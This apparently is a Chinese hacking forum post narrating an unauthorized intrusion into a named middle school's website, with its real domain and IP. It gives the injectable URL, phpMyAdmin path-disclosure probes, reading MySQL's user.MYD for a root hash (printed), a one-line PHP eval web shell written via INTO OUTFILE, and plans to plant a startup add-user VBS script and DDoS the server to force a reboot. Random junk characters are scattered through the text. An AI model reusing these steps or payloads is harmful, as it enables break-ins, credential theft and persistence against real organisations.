友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
+ x0 w1 F- n% t6 ]1 P发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！

3 @, ]! n, c7 o: d: c, m! J

; f* U+ Q4 i& a( w常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

那么想可以直接写入shell ，getshell有几个条件：
" Z0 ~+ U4 O1 Q' u; S

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
( H3 J1 s6 l% _% D$ p0 e) d2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
, r$ J: I" S  f5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
. w" w5 h# J/ n! I7./phpmyadmin/libraries/mcrypt.lib.php   
5 V* ~2 G. W$ J0 ~, v8./phpmyadmin/libraries/export/xls.php  

1 Q! A+ @( Z5 h5 y# \) o% L$ j: _均不行...........................
( v1 R) b* q/ g' C9 O5 }; P9 E+ }
! n: W: V! X, i: u9 K2 R# J6 z御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

6 l$ F% w# Q3 v6 Y3 `1 B权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
5 v/ g: [6 l6 H9 Z
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

4 Z5 U; K  q( ^* X7 i4 F想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
; J( W  a  K  J% i# i
! G( d% U6 R/ }6 i* H' @http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

, p7 v+ K! K" G; B9 N自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
6 Q. Q2 ~( n) Q
成功读到root密码：

17---- r(0072)
18---- o(006f)
* B& ^: i3 L! P' |9 O8 z* }19---- o(006f)
8 \5 x+ Y- I( S: b! e, u9 g20---- t(0074)
21---- *(002a)
- k" B8 A  l& ^* r22---- 8(0038)
+ d3 P% P! B8 c23---- 2(0032)
24---- E(0045)
+ `, d0 ^/ U" d2 ^# E# _* Y25---- 1(0031)
' I% z5 w6 g- W4 _26---- C(0043)
27---- 5(0035)
' G5 M$ _: F8 m28---- 8(0038)
29---- 2(0032)
$ ]% \& d& ^5 b6 x! G8 V1 e30---- 8(0038)
31---- A(0041)
32---- 9(0039)
+ }/ S0 F$ |0 ^33---- B(0042)
- w0 \5 S  F5 E+ x34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
. k" K6 @' H4 `8 a/ J37---- 6(0036)
3 Z0 \  Z( f- `38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
9 u" k3 h. y: o& n( o2 N; V41---- 1(0031)
9 r9 g: f) t8 X42---- 5(0035)
4 a5 }  T. z' o& t7 X- ^; p: ?43---- 3(0033)
9 G% B# M9 p( I5 c; n9 d9 a44---- 5(0035)
# o( Y, {' r0 Y1 e3 y! k45---- 9(0039)
. O% w, b2 F' \8 U! l46---- 8(0038)
47---- F(0046)
48---- F(0046)
49---- 4(0034)
* `0 J0 V2 F: C4 G/ G50---- F(0046)
* d; k8 }5 W+ V( j* X9 x51---- 0(0030)
  o3 N8 [/ L' D52---- 3(0033)
53---- 2(0032)
54---- A(0041)
# v. ^0 l. s2 p2 O1 I55---- 4(0034)
56---- A(0041)
57---- B(0042)
3 b5 A; R0 |( H, y58---- *(0044)
, `* r5 b$ W* I( [; ]! @. I59---- *(0035)
7 v( ]- c. P5 n60---- *(0041)
& c6 ~5 ?. \9 {% G$ U61---- *0032)
5 X0 F/ l, I- x% U+ o& y
解密后成功登陆phpmyamin
6 N& w) H8 d; {$ ~; a% q                          

                             
  U0 G9 u; S  T) u7 N
6 v+ _* ]3 C7 S, A' u6 X找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

成功执行，拿下shell，菜刀连接：
; i$ `" ]# [6 R8 E
服务器不支持asp,aspx,php提权无果...................
, L7 k# S& Y2 k  j3 n7 ]
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

" m0 ?. o- Z" n# C$ V/ C

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

( G) K1 k0 h8 E; E4 ^3 S+ ^

-------------------------------------------------------------------------------
/ M( K: ~) o4 zadmin
Administrator
4 ]+ l/ ?+ X8 [$ ~4 hslipper$
8 Q# X6 i( e2 T$ M% m* v4 R* esqluser
命令成功完成。
: G5 O8 ]& d0 {3 v
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
) x8 a7 s2 W0 z3 q6 y6 J
) A2 {' n5 M* p0 Iddos服务器重启，不然就只能坐等服务器重启了...............................

      

8 o7 I  p1 `# g+ t+ V9 Q

angel